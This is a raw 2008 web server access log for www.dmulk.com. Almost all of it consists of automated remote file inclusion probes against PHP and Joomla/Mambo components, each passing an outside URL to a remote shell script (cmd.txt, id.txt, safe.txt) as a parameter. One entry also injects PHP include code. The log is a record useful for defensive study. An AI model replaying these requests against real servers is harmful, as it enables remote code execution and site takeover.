211.233.19.105 - - [21/Feb/2008:08:35:10 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://kaizo.hut2.ru/new/ro.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
211.233.19.105 - - [21/Feb/2008:08:35:10 -0800] "GET //modules/xfsection/modify.php?dir_module=http://kaizo.hut2.ru/new/ro.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
211.233.19.105 - - [21/Feb/2008:08:35:10 -0800] "GET //modules/xfsection/modify.php?dir_module=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
211.233.19.105 - - [21/Feb/2008:08:35:10 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
222.96.156.153 - - [21/Feb/2008:08:35:34 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
200.89.74.40 - - [21/Feb/2008:08:36:10 -0800] "GET /logs/access_080203.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.153.252.233 - - [21/Feb/2008:08:36:19 -0800] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_mtree&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.clanwac.co.uk/tmp/.../.../cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
78.153.252.233 - - [21/Feb/2008:08:36:19 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_mtree&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.clanwac.co.uk/tmp/.../.../cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
82.146.33.210 - - [21/Feb/2008:08:36:27 -0800] "GET /index2.php?option=com_wmtportfolio§ion=&mosConfig_absolute_path=http://askastro.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
82.146.33.210 - - [21/Feb/2008:08:36:28 -0800] "GET /logs/index2.php?option=com_wmtportfolio§ion=&mosConfig_absolute_path=http://askastro.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.21.152.2 - - [21/Feb/2008:08:36:44 -0800] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.88.23.149 - - [21/Feb/2008:08:37:34 -0800] "GET /index.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://www.geocities.com/jhonw2005/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
69.22.162.60 - - [21/Feb/2008:08:37:34 -0800] "GET /logs/index.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://www.toms-carwash.nl/mailing/oneadmin/upload/read.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
69.22.162.60 - - [21/Feb/2008:08:37:35 -0800] "GET /index.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://www.toms-carwash.nl/mailing/oneadmin/upload/read.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
85.88.23.149 - - [21/Feb/2008:08:37:38 -0800] "GET /logs/index.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://www.geocities.com/jhonw2005/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
69.72.221.130 - - [21/Feb/2008:08:37:38 -0800] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://www.epiriler.com.tr/flash/safe.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.221.130 - - [21/Feb/2008:08:37:39 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.epiriler.com.tr/flash/safe.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.221.130 - - [21/Feb/2008:08:37:39 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.epiriler.com.tr/flash/safe.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.35.196.26 - - [21/Feb/2008:08:38:04 -0800] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://www.epiriler.com.tr/flash/safe.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.35.196.26 - - [21/Feb/2008:08:38:04 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.epiriler.com.tr/flash/safe.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.35.196.26 - - [21/Feb/2008:08:38:04 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.epiriler.com.tr/flash/safe.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.115.110.146 - - [21/Feb/2008:08:39:34 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
211.115.110.146 - - [21/Feb/2008:08:39:34 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
85.234.133.173 - - [21/Feb/2008:08:39:47 -0800] "GET /logs/access.log//modules/agendax/addevent.inc.php?agendax_path=http://www.riothost.com/billing/downloads/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.133.173 - - [21/Feb/2008:08:39:47 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.riothost.com/billing/downloads/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
58.26.137.64 - - [21/Feb/2008:08:39:50 -0800] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [21/Feb/2008:08:39:50 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
64.13.141.14 - - [21/Feb/2008:08:39:51 -0800] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://www.epiriler.com.tr/flash/safe.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.141.14 - - [21/Feb/2008:08:39:51 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.epiriler.com.tr/flash/safe.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.141.14 - - [21/Feb/2008:08:39:51 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.epiriler.com.tr/flash/safe.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.26.137.64 - - [21/Feb/2008:08:39:51 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
211.233.19.105 - - [21/Feb/2008:08:40:38 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
211.233.19.105 - - [21/Feb/2008:08:40:38 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
213.203.223.115 - - [21/Feb/2008:08:40:44 -0800] "GET //administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.26.137.64 - - [21/Feb/2008:08:40:48 -0800] "GET /logs/access_080211.log//components/com_simpleboard/image_upload.php?sbp=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
212.241.183.41 - - [21/Feb/2008:08:40:52 -0800] "GET /bughttp://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
212.241.183.41 - - [21/Feb/2008:08:40:57 -0800] "GET /logs/bughttp://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
124.217.247.200 - - [21/Feb/2008:08:41:11 -0800] "GET /logs/access_080123.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
124.217.247.200 - - [21/Feb/2008:08:41:12 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
124.217.247.200 - - [21/Feb/2008:08:41:13 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.203.223.115 - - [21/Feb/2008:08:41:16 -0800] "GET /logs/access.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.115 - - [21/Feb/2008:08:41:16 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.27.112 - - [21/Feb/2008:08:41:23 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.20.156 - - [21/Feb/2008:08:41:23 -0800] "GET /tmp/?N=A HTTP/1.0" 200 812 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.230.197.170 - - [21/Feb/2008:08:41:31 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.fgo.at/tmp/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.115.110.146 - - [21/Feb/2008:08:41:47 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
211.115.110.146 - - [21/Feb/2008:08:41:47 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
66.232.156.215 - - [21/Feb/2008:08:42:08 -0800] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
66.232.156.215 - - [21/Feb/2008:08:42:08 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
124.217.247.166 - - [21/Feb/2008:08:42:23 -0800] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [21/Feb/2008:08:42:23 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [21/Feb/2008:08:42:24 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.141.194 - - [21/Feb/2008:08:42:30 -0800] "GET //components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.mmge-ac.de//images/.bash/indexfile.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.26.13 - - [21/Feb/2008:08:42:31 -0800] "GET /bikes/?N=D HTTP/1.0" 200 2168 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.84.141.194 - - [21/Feb/2008:08:42:33 -0800] "GET /logs//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.mmge-ac.de//images/.bash/indexfile.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.221.130 - - [21/Feb/2008:08:42:34 -0800] "GET /logs/access_080123.log//modules/TotalCalendar/about.php?inc_dir=http://www.epiriler.com.tr/flash/safe.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.141.194 - - [21/Feb/2008:08:42:37 -0800] "GET /logs/access_080118.log//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.mmge-ac.de//images/.bash/indexfile.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.141.194 - - [21/Feb/2008:08:42:40 -0800] "GET /logs/access.log//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.mmge-ac.de//images/.bash/indexfile.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.203.223.115 - - [21/Feb/2008:08:42:41 -0800] "GET /logs/access_080131.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.217.247.166 - - [21/Feb/2008:08:42:55 -0800] "GET /logs/access_080211.log//components/com_simpleboard/image_upload.php?sbp=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.35.196.26 - - [21/Feb/2008:08:43:14 -0800] "GET /logs/access_080123.log//modules/TotalCalendar/about.php?inc_dir=http://www.epiriler.com.tr/flash/safe.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.23.231 - - [21/Feb/2008:08:44:04 -0800] "GET /megumi/ HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.96.156.153 - - [21/Feb/2008:08:44:10 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
222.96.156.153 - - [21/Feb/2008:08:44:10 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
208.186.169.183 - - [21/Feb/2008:08:44:36 -0800] "GET /logs/access_080118.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [21/Feb/2008:08:44:37 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [21/Feb/2008:08:44:37 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.13.141.14 - - [21/Feb/2008:08:45:03 -0800] "GET /logs/access_080123.log//modules/TotalCalendar/about.php?inc_dir=http://www.epiriler.com.tr/flash/safe.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.188.29.73 - - [21/Feb/2008:08:45:28 -0800] "GET /logs/access_080131.log//main.php?sayfa=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.188.29.73 - - [21/Feb/2008:08:45:28 -0800] "GET /logs//main.php?sayfa=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.186.169.183 - - [21/Feb/2008:08:45:41 -0800] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.64.76.29 - - [21/Feb/2008:08:46:04 -0800] "GET /index.php?option=com_invite&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.9.37.130 - - [21/Feb/2008:08:46:15 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hackergroup.altervista.org/cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
69.9.37.130 - - [21/Feb/2008:08:46:16 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hackergroup.altervista.org/cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
124.217.247.166 - - [21/Feb/2008:08:46:46 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [21/Feb/2008:08:46:46 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [21/Feb/2008:08:46:46 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.76.29 - - [21/Feb/2008:08:47:19 -0800] "GET /logs/access_080120.log/index.php?option=com_invite&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.76.29 - - [21/Feb/2008:08:47:20 -0800] "GET /logs/index.php?option=com_invite&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.96.156.153 - - [21/Feb/2008:08:47:21 -0800] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
222.96.156.153 - - [21/Feb/2008:08:47:22 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.64.76.29 - - [21/Feb/2008:08:47:25 -0800] "GET /logs/access_080101.log/index.php?option=com_invite&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.13.119.114 - - [21/Feb/2008:08:47:38 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://novobx.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
213.13.119.114 - - [21/Feb/2008:08:47:41 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://novobx.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
124.217.247.166 - - [21/Feb/2008:08:48:05 -0800] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [21/Feb/2008:08:48:06 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.186.169.183 - - [21/Feb/2008:08:48:21 -0800] "GET /logs/access_080118.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [21/Feb/2008:08:48:21 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [21/Feb/2008:08:48:21 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
206.222.5.68 - - [21/Feb/2008:08:48:25 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://novobx.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
206.222.5.68 - - [21/Feb/2008:08:48:25 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://novobx.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
81.92.213.177 - - [21/Feb/2008:08:48:33 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://novobx.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
81.92.213.177 - - [21/Feb/2008:08:48:35 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://novobx.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
74.6.23.150 - - [21/Feb/2008:08:48:37 -0800] "GET /tmp/ HTTP/1.0" 200 812 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
124.217.247.166 - - [21/Feb/2008:08:48:46 -0800] "GET /logs/access_080211.log//components/com_simpleboard/image_upload.php?sbp=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.186.169.183 - - [21/Feb/2008:08:49:21 -0800] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.169.158.35 - - [21/Feb/2008:08:49:39 -0800] "GET /logs/access.log/?mosConfig_absolute_path=http://www.wakejunkies.com/mambots/content/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.158.35 - - [21/Feb/2008:08:49:39 -0800] "GET /logs/?mosConfig_absolute_path=http://www.wakejunkies.com/mambots/content/id.txt?? HTTP/1.1" 200 35544 "-" "libwww-perl/5.803" "www.dmulk.com"
24.106.251.51 - - [21/Feb/2008:08:50:23 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://novobx.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
24.106.251.51 - - [21/Feb/2008:08:50:23 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://novobx.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
83.16.96.219 - - [21/Feb/2008:08:50:59 -0800] "GET /logs/access.log/index.php?pagina=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.16.96.219 - - [21/Feb/2008:08:51:00 -0800] "GET /index.php?pagina=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.16.96.219 - - [21/Feb/2008:08:51:01 -0800] "GET /logs/index.php?pagina=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.123.27.136 - - [21/Feb/2008:08:51:18 -0800] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.34.145.199 - - [21/Feb/2008:08:51:29 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.dmulk.com"
64.34.145.199 - - [21/Feb/2008:08:51:29 -0800] "GET /minamijewelry/html/testimonials.html HTTP/1.0" 200 12445 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.dmulk.com"
66.232.156.215 - - [21/Feb/2008:08:52:10 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
66.232.156.215 - - [21/Feb/2008:08:52:13 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
